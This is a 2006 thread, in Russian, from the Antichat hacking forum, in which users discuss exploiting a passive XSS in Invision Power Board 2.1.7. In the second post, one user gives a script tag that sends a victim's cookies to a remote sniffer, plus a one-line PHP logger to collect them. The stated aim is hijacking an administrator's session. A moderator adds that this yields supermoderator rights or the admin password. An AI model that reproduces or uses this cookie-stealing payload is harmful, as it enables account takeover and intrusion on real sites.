HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Xss в Ipb 2.1.7
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Xss в Ipb 2.1.7
  #1  
Старый 15.09.2006, 21:41
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами: 10350730

Репутация: 337
По умолчанию Xss в Ipb 2.1.7
Давайте поподробнее поговорим об пассивном Xss в Ibp 2.1.7.
Предупреждаю - опыта у меня ой как мало и понимаю маловато, поэтому и пришел сюда.
Фичу с внедрением алерта в заголовок ЛС я усвоил. Но мелькало что-то про модеров... чего там можно добиться? И до чего вобще можно дойти, используя этот Xss?
Только с описанием поподробней плз.
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 15.09.2006, 21:55
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
С нами: 10640486

Репутация: 408
По умолчанию
XSS - Cross Site Scripting

Данная бага позволяет тебе украсть куки. Требуется чтоб админ глянул эту страничку с XSS скриптом - ты получишь куки, которые тебе обеспечат доступ. Для того чтобы получить куки тебе понадобится сниффер - скрипт который приймет сигнал от XSS скрипта и запишет куки.

XSS скрипт:
Код:
<script>img = new Image(); img.src='_PATH_';</script>
Где _PATH_ - путь к снифферу. Я лично юзаю свой сниффер. Можешь юзать например ачатовский.

Пример XSS + sniff

Код:
<script>img = new Image(); img.src='_PATH_';</script>
sniff
Код:
<? fputs(fopen("log.txt","a+"),$_SERVER['QUERY_STRING']);
?>
 

  #3  
Старый 15.09.2006, 22:00
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами: 10350730

Репутация: 337
По умолчанию
Хм, админ должен заглянуть на страничку с Xss... Т.е. в случае с ИБП он должен просто отурыть мое ЛС, в заголовке которого и будет Xss?

И вопрос наперед - когда я получу куки, что надо будет сделать для их расшифровки, дабы получить пароль? Просто залогиниться не устраивает =(
 

  #4  
Старый 15.09.2006, 22:04
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию
Используя XSS ты можешь получить права супермодера. Об этом говорили подробно много раз.
Я не считаю нужным оставлять тему открытой ибо, либо куки с xss = супермодер, либо инфа с базы и => пасс админа.

Закрыто.

ПС: Я пожалуй предупрежу: Если ты маловато знаешь - попробуй узнать больше своими силами, тут тебе не faq.
__________________
Full DNS report
 

  #5  
Старый 15.09.2006, 22:07
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию
Юзай поиск. Все ответы есть.
__________________
Full DNS report
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
IPB 2.1.7 passive XSS degeneration x Уязвимости CMS / форумов 20 24.02.2007 00:02
куда заливаются файлы? Ipb 2.1.7 Aztec Уязвимости CMS / форумов 9 06.11.2006 13:29
Может кто нибудь определить префикс в Ipb 2.1.7 samurays Уязвимости CMS / форумов 8 06.09.2006 19:42
XSS vbulletin and IPB v2.1.7 With IE liauliau Уязвимости CMS / форумов 6 16.08.2006 15:19



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.